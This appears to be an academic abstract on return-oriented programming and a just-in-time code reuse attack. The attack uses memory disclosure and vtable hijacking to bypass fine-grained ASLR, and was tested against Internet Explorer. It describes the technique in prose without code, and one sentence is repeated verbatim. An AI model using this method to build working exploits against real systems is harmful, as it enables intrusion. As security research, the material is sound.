| With the development of defensive technology against buffer overflow and format string vulnerability, traditional code injection attacks have not been effective any longer. In this context, a completely new pattern of attack comes out, which is called code reuse attack. Return-to-libc reuse function in GNU C library but this strategy is weak because of low entropy. Hence, Shacham introduced a new approach named return-oriented programming, which chains together short instruction sequences ending with a ret instruction (called gadgets) that already exists in the memory of the application and executes some specific computation.Taking into account that traditional ROP attack needs stack to organize gadget into ROP payload, the limitation is very apparent. The key idea of ASLR is to randomize the base address of the stack, heap, code, and dynamic libraries at load and link time, which offered a plausible defensive strategy against these attacks. But a drawback of this approach is that not all memory regions have been protected with ASLR, the address space for 32bit binaries is small which opens the possibility of probabilistic attacks. Besides that, ASLR on 32-bit architectures only leaves 16 bit of randomness, an attacker might attempt to perform a brute-force attack. After that, smart defenders have been busily working to fortify perimeters by designing fine-grained randomization strategies for repelling the next generation of wily hackers. After that, smart defenders have been busily working to fortify perimeters by designing fine-grained randomization strategies for repelling the next generation of wily hackers.In this paper, we elaborate the development of fine-grained ASLR, analyze the research status and drawback on ROP attack and put forward the future work about ROP attack. Snow first provided the concept of just-in-time code reuse and implementation in the form of framework. But he did not give out the details about memory disclosure, JIT compilation wasting too much time during code reuse attack. through memory disclosure, we implement a completely new variant of code reuse attack wherein we gather code chunks and retrieve them to the desired payload dynamically from memory layout during the vulnerable application is running. Then treating the calling of virtual function as the trampoline, replace the address of function in vtable with every gadget first address in proper sequence. Finally trigger the call of function to complete our ROP attack on-the-fly. We show strong evidence that our variant ROP attack can entirely bypass all fine-grained randomization scheme and ROP mitigation. Based on the above findings, we argue that the fine-grained ASLR strategies still have loopholes. Meanwhile, we hope that our work will inspire others to explore more comprehensive defensive strategy than what exists today.We choose the popular program in windows, such Internet Explorer as target vulnerable program and test our code reuse framework to determine the feasibility and reliability.Finally, we summarize the current influence of defensive strategy, point out flaws in our just-in-time code reuse framework, explore new solutions and future research ideas. |
PDF Full Text Request